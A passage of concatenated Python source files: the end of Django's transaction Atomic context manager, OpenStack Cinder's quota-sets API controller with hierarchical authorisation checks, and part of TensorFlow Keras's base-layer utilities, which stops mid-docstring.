decorated function in the instance itself, used as a context manager.
When it's used as a context manager, __enter__ creates a transaction or a
savepoint, depending on whether a transaction is already in progress, and
__exit__ commits the transaction or releases the savepoint on normal exit,
and rolls back the transaction or to the savepoint on exceptions.
It's possible to disable the creation of savepoints if the goal is to
ensure that some code runs within a transaction without creating overhead.
A stack of savepoints identifiers is maintained as an attribute of the
connection. None denotes the absence of a savepoint.
This allows reentrancy even if the same AtomicWrapper is reused. For
example, it's possible to define `oa = @atomic('other')` and use `@oa` or
`with oa:` multiple times.
Since database connections are thread-local, this is thread-safe.
This is a private API.
"""
def __init__(self, using, savepoint):
self.using = using
self.savepoint = savepoint
def __enter__(self):
connection = get_connection(self.using)
if not connection.in_atomic_block:
# Reset state when entering an outermost atomic block.
connection.commit_on_exit = True
connection.needs_rollback = False
if not connection.get_autocommit():
# Some database adapters (namely sqlite3) don't handle
# transactions and savepoints properly when autocommit is off.
# Turning autocommit back on isn't an option; it would trigger
# a premature commit. Give up if that happens.
if connection.features.autocommits_when_autocommit_is_off:
raise TransactionManagementError(
"Your database backend doesn't behave properly when "
"autocommit is off. Turn it on before using 'atomic'.")
# When entering an atomic block with autocommit turned off,
# Django should only use savepoints and shouldn't commit.
# This requires at least a savepoint for the outermost block.
if not self.savepoint:
raise TransactionManagementError(
"The outermost 'atomic' block cannot use "
"savepoint = False when autocommit is off.")
# Pretend we're already in an atomic block to bypass the code
# that disables autocommit to enter a transaction, and make a
# note to deal with this case in __exit__.
connection.in_atomic_block = True
connection.commit_on_exit = False
if connection.in_atomic_block:
# We're already in a transaction; create a savepoint, unless we
# were told not to or we're already waiting for a rollback. The
# second condition avoids creating useless savepoints and prevents
# overwriting needs_rollback until the rollback is performed.
if self.savepoint and not connection.needs_rollback:
sid = connection.savepoint()
connection.savepoint_ids.append(sid)
else:
connection.savepoint_ids.append(None)
else:
# We aren't in a transaction yet; create one.
# The usual way to start a transaction is to turn autocommit off.
# However, some database adapters (namely sqlite3) don't handle
# transactions and savepoints properly when autocommit is off.
# In such cases, start an explicit transaction instead, which has
# the side-effect of disabling autocommit.
if connection.features.autocommits_when_autocommit_is_off:
connection._start_transaction_under_autocommit()
connection.autocommit = False
else:
connection.set_autocommit(False)
connection.in_atomic_block = True
def __exit__(self, exc_type, exc_value, traceback):
connection = get_connection(self.using)
if connection.savepoint_ids:
sid = connection.savepoint_ids.pop()
else:
# Prematurely unset this flag to allow using commit or rollback.
connection.in_atomic_block = False
try:
if connection.closed_in_transaction:
# The database will perform a rollback by itself.
# Wait until we exit the outermost block.
pass
elif exc_type is None and not connection.needs_rollback:
if connection.in_atomic_block:
# Release savepoint if there is one
if sid is not None:
try:
connection.savepoint_commit(sid)
except DatabaseError:
try:
connection.savepoint_rollback(sid)
# The savepoint won't be reused. Release it to
# minimize overhead for the database server.
connection.savepoint_commit(sid)
except Error:
# If rolling back to a savepoint fails, mark for
# rollback at a higher level and avoid shadowing
# the original exception.
connection.needs_rollback = True
raise
else:
# Commit transaction
try:
connection.commit()
except DatabaseError:
try:
connection.rollback()
except Error:
# An error during rollback means that something
# went wrong with the connection. Drop it.
connection.close()
raise
else:
# This flag will be set to True again if there isn't a savepoint
# allowing to perform the rollback at this level.
connection.needs_rollback = False
if connection.in_atomic_block:
# Roll back to savepoint if there is one, mark for rollback
# otherwise.
if sid is None:
connection.needs_rollback = True
else:
try:
connection.savepoint_rollback(sid)
# The savepoint won't be reused. Release it to
# minimize overhead for the database server.
connection.savepoint_commit(sid)
except Error:
# If rolling back to a savepoint fails, mark for
# rollback at a higher level and avoid shadowing
# the original exception.
connection.needs_rollback = True
else:
# Roll back transaction
try:
connection.rollback()
except Error:
# An error during rollback means that something
# went wrong with the connection. Drop it.
connection.close()
finally:
# Outermost block exit when autocommit was enabled.
if not connection.in_atomic_block:
if connection.closed_in_transaction:
connection.connection = None
elif connection.features.autocommits_when_autocommit_is_off:
connection.autocommit = True
else:
connection.set_autocommit(True)
# Outermost block exit when autocommit was disabled.
elif not connection.savepoint_ids and not connection.commit_on_exit:
if connection.closed_in_transaction:
connection.connection = None
else:
connection.in_atomic_block = False
def atomic(using=None, savepoint=True):
# Bare decorator: @atomic -- although the first argument is called
# `using`, it's actually the function being decorated.
if callable(using):
return Atomic(DEFAULT_DB_ALIAS, savepoint)(using)
# Decorator: @atomic(...) or context manager: with atomic(...): ...
else:
return Atomic(using, savepoint)
def _non_atomic_requests(view, using):
try:
view._non_atomic_requests.add(using)
except AttributeError:
view._non_atomic_requests = {using}
return view
def non_atomic_requests(using=None):
if callable(using):
return _non_atomic_requests(using, DEFAULT_DB_ALIAS)
else:
if using is None:
using = DEFAULT_DB_ALIAS
return lambda view: _non_atomic_requests(view, using)
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from oslo_utils import strutils
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder import db
from cinder.db.sqlalchemy import api as sqlalchemy_api
from cinder import exception
from cinder.i18n import _
from cinder import quota
from cinder import quota_utils
from cinder import utils
QUOTAS = quota.QUOTAS
NON_QUOTA_KEYS = ['tenant_id', 'id']
authorize_update = extensions.extension_authorizer('volume', 'quotas:update')
authorize_show = extensions.extension_authorizer('volume', 'quotas:show')
authorize_delete = extensions.extension_authorizer('volume', 'quotas:delete')
class QuotaSetsController(wsgi.Controller):
def _format_quota_set(self, project_id, quota_set):
"""Convert the quota object to a result dict."""
quota_set['id'] = str(project_id)
return dict(quota_set=quota_set)
def _validate_existing_resource(self, key, value, quota_values):
# -1 limit will always be greater than the existing value
if key == 'per_volume_gigabytes' or value == -1:
return
v = quota_values.get(key, {})
used = (v.get('in_use', 0) + v.get('reserved', 0))
if QUOTAS.using_nested_quotas():
used += v.get('allocated', 0)
if value < used:
# TODO(mc_nair): after N opens, update error message to include
# the current usage and requested limit
msg = _("Quota %s limit must be equal or greater than existing "
"resources.") % key
raise webob.exc.HTTPBadRequest(explanation=msg)
def _get_quotas(self, context, id, usages=False):
values = QUOTAS.get_project_quotas(context, id, usages=usages)
if usages:
return values
else:
return {k: v['limit'] for k, v in values.items()}
def _authorize_update_or_delete(self, context_project,
target_project_id,
parent_id):
"""Checks if update or delete are allowed in the current hierarchy.
With hierarchical projects, only the admin of the parent or the root
project has privilege to perform quota update and delete operations.
:param context_project: The project in which the user is scoped to.
:param target_project_id: The id of the project in which the
user want to perform an update or
delete operation.
:param parent_id: The parent id of the project in which the user
want to perform an update or delete operation.
"""
if context_project.is_admin_project:
# The calling project has admin privileges and should be able
# to operate on all quotas.
return
if context_project.parent_id and parent_id != context_project.id:
msg = _("Update and delete quota operations can only be made "
"by an admin of immediate parent or by the CLOUD admin.")
raise webob.exc.HTTPForbidden(explanation=msg)
if context_project.id != target_project_id:
if not self._is_descendant(target_project_id,
context_project.subtree):
msg = _("Update and delete quota operations can only be made "
"to projects in the same hierarchy of the project in "
"which users are scoped to.")
raise webob.exc.HTTPForbidden(explanation=msg)
else:
msg = _("Update and delete quota operations can only be made "
"by an admin of immediate parent or by the CLOUD admin.")
raise webob.exc.HTTPForbidden(explanation=msg)
def _authorize_show(self, context_project, target_project):
"""Checks if show is allowed in the current hierarchy.
With hierarchical projects, users are allowed to perform a quota show
operation if they have the cloud admin role or if they belong to at
least one of the following projects: the target project, its immediate
parent project, or the root project of its hierarchy.
:param context_project: The project in which the user
is scoped to.
:param target_project: The project in which the user wants
to perform a show operation.
"""
if context_project.is_admin_project:
# The calling project has admin privileges and should be able
# to view all quotas.
return
if target_project.parent_id:
if target_project.id != context_project.id:
if not self._is_descendant(target_project.id,
context_project.subtree):
msg = _("Show operations can only be made to projects in "
"the same hierarchy of the project in which users "
"are scoped to.")
raise webob.exc.HTTPForbidden(explanation=msg)
if context_project.id != target_project.parent_id:
if context_project.parent_id:
msg = _("Only users with token scoped to immediate "
"parents or root projects are allowed to see "
"its children quotas.")
raise webob.exc.HTTPForbidden(explanation=msg)
elif context_project.parent_id:
msg = _("An user with a token scoped to a subproject is not "
"allowed to see the quota of its parents.")
raise webob.exc.HTTPForbidden(explanation=msg)
def _is_descendant(self, target_project_id, subtree):
if subtree is not None:
for key, value in subtree.items():
if key == target_project_id:
return True
if self._is_descendant(target_project_id, value):
return True
return False
def show(self, req, id):
"""Show quota for a particular tenant
This works for hierarchical and non-hierarchical projects. For
hierarchical projects admin of current project, immediate
parent of the project or the CLOUD admin are able to perform
a show.
:param req: request
:param id: target project id that needs to be shown
"""
context = req.environ['cinder.context']
authorize_show(context)
params = req.params
target_project_id = id
if not hasattr(params, '__call__') and 'usage' in params:
usage = utils.get_bool_param('usage', params)
else:
usage = False
if QUOTAS.using_nested_quotas():
# With hierarchical projects, only the admin of the current project
# or the root project has privilege to perform quota show
# operations.
target_project = quota_utils.get_project_hierarchy(
context, target_project_id)
context_project = quota_utils.get_project_hierarchy(
context, context.project_id, subtree_as_ids=True,
is_admin_project=context.is_admin)
self._authorize_show(context_project, target_project)
try:
sqlalchemy_api.authorize_project_context(context,
target_project_id)
except exception.NotAuthorized:
raise webob.exc.HTTPForbidden()
quotas = self._get_quotas(context, target_project_id, usage)
return self._format_quota_set(target_project_id, quotas)
def update(self, req, id, body):
"""Update Quota for a particular tenant
This works for hierarchical and non-hierarchical projects. For
hierarchical projects only immediate parent admin or the
CLOUD admin are able to perform an update.
:param req: request
:param id: target project id that needs to be updated
:param body: key, value pair that that will be
applied to the resources if the update
succeeds
"""
context = req.environ['cinder.context']
authorize_update(context)
self.validate_string_length(id, 'quota_set_name',
min_length=1, max_length=255)
self.assert_valid_body(body, 'quota_set')
# Get the optional argument 'skip_validation' from body,
# if skip_validation is False, then validate existing resource.
skip_flag = body.get('skip_validation', True)
if not utils.is_valid_boolstr(skip_flag):
msg = _("Invalid value '%s' for skip_validation.") % skip_flag
raise exception.InvalidParameterValue(err=msg)
skip_flag = strutils.bool_from_string(skip_flag)
target_project_id = id
bad_keys = []
# NOTE(ankit): Pass #1 - In this loop for body['quota_set'].items(),
# we figure out if we have any bad keys.
for key, value in body['quota_set'].items():
if (key not in QUOTAS and key not in NON_QUOTA_KEYS):
bad_keys.append(key)
continue
if len(bad_keys) > 0:
msg = _("Bad key(s) in quota set: %s") % ",".join(bad_keys)
raise webob.exc.HTTPBadRequest(explanation=msg)
# Saving off this value since we need to use it multiple times
use_nested_quotas = QUOTAS.using_nested_quotas()
if use_nested_quotas:
# Get the parent_id of the target project to verify whether we are
# dealing with hierarchical namespace or non-hierarchical namespace
target_project = quota_utils.get_project_hierarchy(
context, target_project_id, parents_as_ids=True)
parent_id = target_project.parent_id
if parent_id:
# Get the children of the project which the token is scoped to
# in order to know if the target_project is in its hierarchy.
context_project = quota_utils.get_project_hierarchy(
context, context.project_id, subtree_as_ids=True,
is_admin_project=context.is_admin)
self._authorize_update_or_delete(context_project,
target_project.id,
parent_id)
# NOTE(ankit): Pass #2 - In this loop for body['quota_set'].keys(),
# we validate the quota limits to ensure that we can bail out if
# any of the items in the set is bad. Meanwhile we validate value
# to ensure that the value can't be lower than number of existing
# resources.
quota_values = QUOTAS.get_project_quotas(context, target_project_id,
defaults=False)
valid_quotas = {}
reservations = []
for key in body['quota_set'].keys():
if key in NON_QUOTA_KEYS:
continue
value = utils.validate_integer(
body['quota_set'][key], key, min_value=-1,
max_value=db.MAX_INT)
# Can't skip the validation of nested quotas since it could mess up
# hierarchy if parent limit is less than childrens' current usage
if not skip_flag or use_nested_quotas:
self._validate_existing_resource(key, value, quota_values)
if use_nested_quotas:
try:
reservations += self._update_nested_quota_allocated(
context, target_project, quota_values, key, value)
except exception.OverQuota as e:
if reservations:
db.reservation_rollback(context, reservations)
raise webob.exc.HTTPBadRequest(explanation=e.msg)
valid_quotas[key] = value
# NOTE(ankit): Pass #3 - At this point we know that all the keys and
# values are valid and we can iterate and update them all in one shot
# without having to worry about rolling back etc as we have done
# the validation up front in the 2 loops above.
for key, value in valid_quotas.items():
try:
db.quota_update(context, target_project_id, key, value)
except exception.ProjectQuotaNotFound:
db.quota_create(context, target_project_id, key, value)
except exception.AdminRequired:
raise webob.exc.HTTPForbidden()
if reservations:
db.reservation_commit(context, reservations)
return {'quota_set': self._get_quotas(context, target_project_id)}
def _get_quota_usage(self, quota_obj):
return (quota_obj.get('in_use', 0) + quota_obj.get('allocated', 0) +
quota_obj.get('reserved', 0))
def _update_nested_quota_allocated(self, ctxt, target_project,
target_project_quotas, res, new_limit):
reservations = []
# per_volume_gigabytes doesn't make sense to nest
if res == "per_volume_gigabytes":
return reservations
quota_for_res = target_project_quotas.get(res, {})
orig_quota_from_target_proj = quota_for_res.get('limit', 0)
# If limit was -1, we were "taking" current child's usage from parent
if orig_quota_from_target_proj == -1:
orig_quota_from_target_proj = self._get_quota_usage(quota_for_res)
new_quota_from_target_proj = new_limit
# If we set limit to -1, we will "take" the current usage from parent
if new_limit == -1:
new_quota_from_target_proj = self._get_quota_usage(quota_for_res)
res_change = new_quota_from_target_proj - orig_quota_from_target_proj
if res_change != 0:
deltas = {res: res_change}
reservations += quota_utils.update_alloc_to_next_hard_limit(
ctxt, QUOTAS.resources, deltas, res, None, target_project.id)
return reservations
def defaults(self, req, id):
context = req.environ['cinder.context']
authorize_show(context)
return self._format_quota_set(id, QUOTAS.get_defaults(
context, project_id=id))
def delete(self, req, id):
"""Delete Quota for a particular tenant.
This works for hierarchical and non-hierarchical projects. For
hierarchical projects only immediate parent admin or the
CLOUD admin are able to perform a delete.
:param req: request
:param id: target project id that needs to be deleted
"""
context = req.environ['cinder.context']
authorize_delete(context)
if QUOTAS.using_nested_quotas():
self._delete_nested_quota(context, id)
else:
try:
db.quota_destroy_by_project(context, id)
except exception.AdminRequired:
raise webob.exc.HTTPForbidden()
def _delete_nested_quota(self, ctxt, proj_id):
# Get the parent_id of the target project to verify whether we are
# dealing with hierarchical namespace or non-hierarchical
# namespace.
try:
project_quotas = QUOTAS.get_project_quotas(
ctxt, proj_id, usages=True, defaults=False)
except exception.NotAuthorized:
raise webob.exc.HTTPForbidden()
target_project = quota_utils.get_project_hierarchy(
ctxt, proj_id)
parent_id = target_project.parent_id
if parent_id:
# Get the children of the project which the token is scoped to
# in order to know if the target_project is in its hierarchy.
context_project = quota_utils.get_project_hierarchy(
ctxt, ctxt.project_id, subtree_as_ids=True)
self._authorize_update_or_delete(context_project,
target_project.id,
parent_id)
defaults = QUOTAS.get_defaults(ctxt, proj_id)
# If the project which is being deleted has allocated part of its
# quota to its subprojects, then subprojects' quotas should be
# deleted first.
for res, value in project_quotas.items():
if 'allocated' in project_quotas[res].keys():
if project_quotas[res]['allocated'] > 0:
msg = _("About to delete child projects having "
"non-zero quota. This should not be performed")
raise webob.exc.HTTPBadRequest(explanation=msg)
# Ensure quota usage wouldn't exceed limit on a delete
self._validate_existing_resource(
res, defaults[res], project_quotas)
try:
db.quota_destroy_by_project(ctxt, target_project.id)
except exception.AdminRequired:
raise webob.exc.HTTPForbidden()
for res, limit in project_quotas.items():
# Update child limit to 0 so the parent hierarchy gets it's
# allocated values updated properly
self._update_nested_quota_allocated(
ctxt, target_project, project_quotas, res, 0)
def validate_setup_for_nested_quota_use(self, req):
"""Validates that the setup supports using nested quotas.
Ensures that Keystone v3 or greater is being used, and that the
existing quotas make sense to nest in the current hierarchy (e.g. that
no child quota would be larger than it's parent).
"""
ctxt = req.environ['cinder.context']
params = req.params
try:
quota_utils.validate_setup_for_nested_quota_use(
ctxt, QUOTAS.resources, quota.NestedDbQuotaDriver(),
fix_allocated_quotas=params.get('fix_allocated_quotas'))
except exception.InvalidNestedQuotaSetup as e:
raise webob.exc.HTTPBadRequest(explanation=e.msg)
class Quotas(extensions.ExtensionDescriptor):
"""Quota management support."""
name = "Quotas"
alias = "os-quota-sets"
updated = "2011-08-08T00:00:00+00:00"
def get_resources(self):
resources = []
res = extensions.ResourceExtension(
'os-quota-sets', QuotaSetsController(),
member_actions={'defaults': 'GET'},
collection_actions={'validate_setup_for_nested_quota_use': 'GET'})
resources.append(res)
return resources
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains private utilities used mainly by the base Layer class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.python import tf2
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import control_flow_v2_func_graphs
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import init_ops_v2
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training.tracking import base as tracking
from tensorflow.python.util import nest
from tensorflow.python.util import tf_contextlib
_call_context = threading.local()
def create_mean_metric(value, name=None):
# import keras will import base_layer and then this module, and metric relies
# on base_layer, which result into a cyclic dependency.
from tensorflow.python.keras import metrics as metrics_module # pylint: disable=g-import-not-at-top
metric_obj = metrics_module.Mean(name=name, dtype=value.dtype)
return metric_obj, metric_obj(value)
def make_variable(name,
shape=None,
dtype=dtypes.float32,
initializer=None,
trainable=None,
caching_device=None,
validate_shape=True,
constraint=None,
use_resource=None,
collections=None,
synchronization=tf_variables.VariableSynchronization.AUTO,
aggregation=tf_variables.VariableAggregation.NONE,
partitioner=None): # pylint: disable=unused-argument
"""Temporary util to create a variable (relies on `variable_scope.variable`).
Some reuse-related technicalities prevent us from using
`variable_scope.get_variable()` directly, so we use a subcomponent
that has fewer constraints (`variable_scope.variable()`).
In the longer term, it seems like a similar "default variable creator" method
should exist in `Trackable` instead. When this happens, we can get
rid of this temporary solution.
TODO(fchollet): remove this method when no longer needed.
Arguments:
name: Variable name.
shape: Variable shape.
dtype: The type of the variable. Defaults to `self.dtype` or `float32`.
initializer: Initializer instance (callable).
trainable: Whether the variable should be part of the layer's
"trainable_variables" (e.g. variables, biases)
or "non_trainable_variables" (e.g. BatchNorm mean, stddev).
Note, if the current variable scope is marked as non-trainable
then this parameter is ignored and any added variables are also
marked as non-trainable. `trainable` defaults to `True` unless
`synchronization` is set to `ON_READ`.
caching_device: Passed to `tf.Variable`.
validate_shape: Passed to `tf.Variable`.
constraint: Constraint instance (callable).
use_resource: Whether to use a `ResourceVariable`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
partitioner: Not handled at this time.
Returns:
Variable instance.
"""
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(
initializer,
(type(init_ops.Initializer), type(init_ops_v2.Initializer))):
initializer = initializer()
init_val = lambda: initializer(shape, dtype=dtype)
variable_dtype = dtype.base_dtype
if use_resource is None:
use_resource = True
# TODO(apassos,rohanj) figure out how to remove collections from here so we
# can remove the V1.
variable_shape = tensor_shape.TensorShape(shape)
return tf_variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
collections=collections,
synchronization=synchronization,
aggregation=aggregation,
shape=variable_shape if variable_shape else None)
def collect_previous_mask(input_tensors):
"""Retrieves the output mask(s) of the previous node.
Arguments:
input_tensors: An arbitrary structure of Tensors.
Returns:
A mask tensor or list of mask tensors.
"""
def _collect_previous_mask(x):
return getattr(x, '_keras_mask', None)
return nest.map_structure(_collect_previous_mask, input_tensors)
def have_all_keras_metadata(tensors):
return all(hasattr(x, '_keras_history') for x in nest.flatten(tensors))
def generate_placeholders_from_shape(shape):
return array_ops.placeholder(shape=shape, dtype=backend.floatx())
def create_keras_history(tensors):
"""Wraps TensorFlow Operations for compatibility with the Functional API.
This method checks to see if a Tensor in `tensors` is missing Keras metadata
and has its origin in a Keras `Input` Layer. If so, this method will replace
the raw TensorFlow Operations that created this tensor with
`TensorFlowOpLayer` instances that create identical operations.
Any Tensors not originating from a Keras `Input` Layer will be treated as
constants when constructing `TensorFlowOpLayer` instances.
Arguments:
tensors: A structure of Tensors, some of which come from raw TensorFlow
operations and need to have Keras metadata assigned to them.
Returns:
created_layers: List. The `TensorFlowOpLayer` instances created to wrap
the raw Tensorflow operations.
"""
_, created_layers = _create_keras_history_helper(tensors, set(), [])
return created_layers
def _create_keras_history_helper(tensors, processed_ops, created_layers):
"""Helper method for `create_keras_history`.
Arguments:
tensors: A structure of Tensors for which to create Keras metadata.
processed_ops: Set. TensorFlow operations that have already been wrapped in
`TensorFlowOpLayer` instances.
created_layers: List. The `TensorFlowOpLayer` instances created.
Returns:
Tuple. First element is the updated set of TensorFlow Operations that
have been wrapped in `TensorFlowOpLayer` instances. Second element is
a list of the `TensorFlowOpLayer` instances created.
"""
# Import of `base_layer` needed in order to create `TensorFlowOpLayer`.
# Cannot be imported at top because of circular dependencies.
# TODO(omalleyt): Resolve circular dependency.
from tensorflow.python.keras.engine import base_layer # pylint: disable=g-import-not-at-top
tensor_list = nest.flatten(tensors)
for tensor in tensor_list:
if getattr(tensor, '_keras_history', None) is not None:
continue
op = tensor.op # The Op that created this Tensor.
if op not in processed_ops:
if op.type.startswith('Sparse'):
lambda_example = """
weights_mult = lambda x: tf.sparse.sparse_dense_matmul(x, weights)
output = tf.keras.layers.Lambda(weights_mult)(input)
"""
raise ValueError(
'Sparse ops are not supported with functional models with built-in '
'layer wrapping. Please wrap the sparse ops in a Lambda layer like'
': \n{lambda_example}\n'.format(lambda_example=lambda_example))
# Recursively set `_keras_history`.
op_inputs = list(op.inputs)
constants = {}
layer_inputs = []
for i, op_input in enumerate(op_inputs):
if uses_keras_history(op_input):
layer_inputs.append(op_input)
else:
# Treat any value not originating from a `keras.Input` as
# a constant. Variables cannot be supported.
ds_with_session = (
distribution_strategy_context.in_cross_replica_context() and
not ops.executing_eagerly_outside_functions())
using_xla = control_flow_util.GraphOrParentsInXlaContext(
ops.get_default_graph())
if ds_with_session or using_xla:
# In Legacy Graph mode, evaluating here makes Session be
# configured improperly. The downside of this is that saving
# via `get_config` breaks, but SavedModel still works.
constants[i] = op_input
else:
with ops.init_scope():
constants[i] = backend.function([], op_input)([])
layer_inputs = unnest_if_single_tensor(layer_inputs)
processed_ops, created_layers = _create_keras_history_helper(
layer_inputs, processed_ops, created_layers)
name = op.name
node_def = op.node_def.SerializeToString()
op_layer = base_layer.TensorFlowOpLayer(
node_def, constants=constants, name=name)
created_layers.append(op_layer)
op_layer._add_inbound_node( # pylint: disable=protected-access
layer_inputs, op.outputs)
processed_ops.update([op])
return processed_ops, created_layers
def unnest_if_single_tensor(input_tensors):
# Preserve compatibility with older configs
flat_input_tensors = nest.flatten(input_tensors)
# If this is a single element but not a dict, unwrap. If this is a dict,
# assume the first layer expects a dict (as is the case with a
# DenseFeatures layer); pass through.
if not isinstance(input_tensors, dict) and len(flat_input_tensors) == 1:
input_tensors = flat_input_tensors[0]
return input_tensors
def needs_keras_history(tensors, ignore_call_context=False):
"""Check if any Tensors need to be wrapped in TensorFlowOpLayers.
This will never return True inside a sublayer, because sublayers
do not need to create Keras History. Otherwise, this returns True
if one or more of `tensors` originates from a `keras.Input` and
does not have `_keras_history` set.
Arguments:
tensors: An arbitrary nested structure of Tensors.
ignore_call_context: Whether to ignore the check of if currently
outside of a `call` context. This is `True` when creating
KerasHistory inside `Node`, where we always know that Tensors
are being used with the Functional API.
Returns:
Bool, whether at least one Tensor needs to be wrapped.
"""
input_tensors = nest.flatten(tensors)
if call_context().in_call and not ignore_call_context:
return False
if all(
getattr(tensor, '_keras_history', None) is not None
for tensor in input_tensors):
# KerasHistory already set.
return False
return uses_keras_history(tensors)
def is_in_keras_graph():
"""Returns if currently executing inside of a Keras graph."""
return call_context().in_keras_graph
def is_in_eager_or_tf_function():
"""Returns if in eager mode or inside of a tf.function."""
return context.executing_eagerly() or is_in_tf_function()
def is_in_tf_function():
"""Returns if inside of a tf.function."""
# Check if running in V1 graph mode.
if not ops.executing_eagerly_outside_functions():
return False
if not ops.inside_function():
return False
# Check if inside Keras FuncGraph.
if is_in_keras_graph():
return False
# Check for a v1 `wrap_function` FuncGraph.
graph = ops.get_default_graph()
if (getattr(graph, 'name', False) and
graph.name.startswith('wrapped_function')):
return False
return True
def uses_keras_history(tensors):
"""Check if at least one Tensor originates from a `keras.Input`.
This is `True` if at least one Tensor has its origin in a `keras.Input`.
Any Tensor that originates from a `keras.Input` will have a dependency
Tensor with a `_keras_history` attribute attached. Tensors that have
already been checked to not originate from a `keras.Input`
are marked as `_keras_history_checked`.
Arguments:
tensors: An arbitrary nested structure of Tensors.
Returns:
Bool, whether at least one Tensor originates from a `keras.Input`.
"""
checked_tensors = set()
tensors_to_check = nest.flatten(tensors)
while tensors_to_check:
new_tensors_to_check = []
for tensor in tensors_to_check:
if id(tensor) in checked_tensors:
continue
checked_tensors.add(id(tensor))
if getattr(tensor, '_keras_history_checked', None) is not None:
continue
if getattr(tensor, '_keras_history', None) is not None:
return True
try:
new_tensors_to_check.extend(tensor.op.inputs)
except AttributeError:
# In case `tensor` is a Variable created in an Eager context.
pass
tensors_to_check = new_tensors_to_check
# Mark that these Tensors have been checked once for `_keras_history`,
# and should not be checked again for performance reasons.
mark_checked(tensors)
return False
def mark_checked(tensors):
"""Marks that these Tensors should not be tracked.
This prevents Layers from attempting to create TensorFlowOpLayers
for these Tensors.
Arguments:
tensors: An arbitrary structure of Tensors.
"""
def _mark_checked(tensor):
tensor._keras_history_checked = True # pylint: disable=protected-access
nest.map_structure(_mark_checked, tensors)
def call_context():
"""Returns currently active `CallContext`."""
if getattr(_call_context, 'call_context', None) is None:
_call_context.call_context = CallContext()
return _call_context.call_context
control_flow_util_v2._register_keras_layer_context_function(call_context) # pylint: disable=protected-access
class CallContext(object):
"""Keeps track of properties currently inside a Layer/Model's `call`.
Attributes:
layer: The `Layer` whose `call` is currently active.
inputs: The inputs to the currently active `Layer`.
frozen: Whether currently executing inside a `Layer` with `trainable` set to
`False`.
in_call: Whether currently inside the `call` of a Layer.
training: Whether currently executing in training or inference mode.
in_keras_graph: Whether executing inside the Keras Graph.
saving: Whether currently saving to SavedModel.
"""
def __init__(self):
self.layer = None
self.inputs = None
self.frozen = False
self.in_call = False
self.training = None
self._in_keras_graph = False
self.saving = False
@tf_contextlib.contextmanager
def enter(self, layer, inputs, build_graph, training, saving=None):
"""Push a Layer and its inputs and state onto the current call context."""
prev_layer = self.layer
prev_inputs = self.inputs
prev_frozen = self.frozen
prev_in_call = self.in_call
prev_training = self.training
prev_in_keras_graph = self._in_keras_graph
prev_saving = self.saving
self.layer = layer
self.inputs = inputs
self.frozen = self.frozen or not layer.trainable
self.in_call = True
self.training = training
self._in_keras_graph = (
self._in_keras_graph or
(build_graph and
getattr(backend.get_graph(), 'name', None) == 'keras_graph'))
self.saving = prev_saving if saving is None else saving
try:
yield
finally:
self.layer = prev_layer
self.inputs = prev_inputs
self.frozen = prev_frozen
self.in_call = prev_in_call
self.training = prev_training
self._in_keras_graph = prev_in_keras_graph
self.saving = prev_saving
@property
def in_keras_graph(self):
# Returns True even if in a subgraph of the Keras graph, such as those
# created by control flow ops.
if context.executing_eagerly():
return False
return (self._in_keras_graph or
getattr(backend.get_graph(), 'name', None) == 'keras_graph')
def training_arg_passed_to_call(argspec, args, kwargs):
"""Returns whether a user passed the `training` argument in `__call__`."""
# `argspec.args` starts with ['self', 'inputs']
full_args = dict(zip(argspec.args[2:], args))
full_args.update(kwargs)
return 'training' in full_args and full_args['training'] is not None
def autocast_context_manager(dtype):
"""Returns a context manager to autocast AutoCastVariables.
Under this context manager, AutoCastVariables will be casted to `dtype` if
`dtype` is floating-point. Otherwise, AutoCastVariables will not be casted.
Args:
dtype: The dtype to cast AutoCastVariables to, or None.
Returns:
A context manager to automatically cast AutoCastVariables.
"""
if dtype and not dtypes.as_dtype(dtype).is_floating:
dtype = None
return ops.get_default_graph()._enable_auto_casting_variables(dtype) # pylint: disable=protected-access
def is_subclassed(layer):
"""Returns True if the object is a subclassed layer or subclassed model."""
return (layer.__module__.find('keras.engine') == -1 and
layer.__module__.find('keras.layers') == -1)
def from_saved_model(layer):
"""Returns whether the layer is loaded from a SavedModel."""
return layer.__module__.find('keras.saving.saved_model') != -1
def check_graph_consistency(tensor=None, method='add_loss', force_raise=False):
"""Checks that tensors passed to `add_*` method match the Keras graph.
When one of the `add_*` method is called inside a V2 conditional branch,
